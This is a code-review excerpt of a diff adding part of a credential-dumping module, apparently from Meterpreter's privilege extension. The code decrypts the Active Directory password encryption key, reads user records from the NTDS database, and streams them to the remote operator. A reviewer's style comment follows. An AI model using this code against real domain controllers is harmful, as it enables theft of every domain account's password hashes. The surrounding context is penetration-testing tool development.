source/extensions/priv/server/ntds.c

```diff
@@ -0,0 +1,215 @@
+		engine_shutdown(ntdsState);
+		goto out;
+	}
+	if (!decrypt_PEK(sysKey, pekEncrypted, pekDecrypted)){
+		res = GetLastError();
+		engine_shutdown(ntdsState);
+		goto out;
+	}
+	// Set our Cursor on the first User record
+	JET_ERR cursorStatus = find_first(ntdsState);
+	if (cursorStatus != JET_errSuccess){
+		res = cursorStatus;
+		engine_shutdown(ntdsState);
+		goto out;
+	}
+	cursorStatus = next_user(ntdsState, accountColumns);
+	if (cursorStatus != JET_errSuccess){
+		res = cursorStatus;
+		engine_shutdown(ntdsState);
+		goto out;
+	}
+
+	// If we made it this far, it's time to set up our channel
+	PoolChannelOps chops;
+	Channel *newChannel;
+	memset(&chops, 0, sizeof(chops));
+
+	NTDSContext *ctx;
+	// Allocate storage for the NTDS context
+	if (!(ctx = calloc(1, sizeof(NTDSContext)))) {
+		res = ERROR_NOT_ENOUGH_MEMORY;
+		goto out;
+	}
+
+	ctx->accountColumns = accountColumns;
+	ctx->ntdsState = ntdsState;
+	ctx->pekDecrypted = pekDecrypted;
+	ctx->eof = FALSE;
+
+	// Initialize the pool operation handlers
+	chops.native.context = ctx;
+	chops.native.write = ntds_channel_write;
+	chops.native.close = ntds_channel_close;
+	chops.eof = ntds_channel_eof;
+	chops.read = ntds_channel_read;
+	if (!(newChannel = channel_create_pool(0, CHANNEL_FLAG_SYNCHRONOUS, &chops)))
+	{
+		res = ERROR_NOT_ENOUGH_MEMORY;
+		goto out;
+	}
+
+	channel_set_type(newChannel, "ntds");
+	packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channel_get_id(newChannel));
+
+out:
+	packet_transmit_response(res, remote, response);
+	return res;
+}
+
+// This callback function is just a stub as this channel does
+// not actually support writing.
+static DWORD ntds_channel_write(Channel *channel, Packet *request,
+	LPVOID context, LPVOID buffer, DWORD bufferSize, LPDWORD bytesWritten){
+	return ERROR_SUCCESS;
+}
+
+// This function reads an individual account record from the database and moves
+// the cursor to the next one in the table.
+static DWORD ntds_read_into_batch(NTDSContext *ctx, ntdsAccount *batchedAccount){
+	DWORD result = ERROR_SUCCESS;
+	JET_ERR readStatus = JET_errSuccess;
+	ntdsAccount *userAccount = malloc(sizeof(ntdsAccount));
+	memset(userAccount, 0, sizeof(ntdsAccount));
+	readStatus = read_user(ctx->ntdsState, ctx->accountColumns, ctx->pekDecrypted, userAccount);
+	if (readStatus != JET_errSuccess){
+		result = readStatus;
+	}
+	else{
+		memcpy(batchedAccount, userAccount, sizeof(ntdsAccount));
+	}
+	free(userAccount);
+	return result;
+}
+
+// This callback fires when the remote side requests a read from the channel.
+// It call ntds_read_into_batch up to 20 times and feeds the results into
+// an array which is then written back out into the channel's output buffer
+static DWORD ntds_channel_read(Channel *channel, Packet *request,
+	LPVOID context, LPVOID buffer, DWORD bufferSize, LPDWORD bytesRead){
+	JET_ERR readStatus = JET_errSuccess;
+	DWORD result = ERROR_SUCCESS;
+	NTDSContext *ctx = (NTDSContext *)context;
+	ntdsAccount batchedAccounts[20];

```

Comment:
ntdsAccount batchedAccounts[20] = { 0 }; also initializes the array in advance, no need to explicitly memset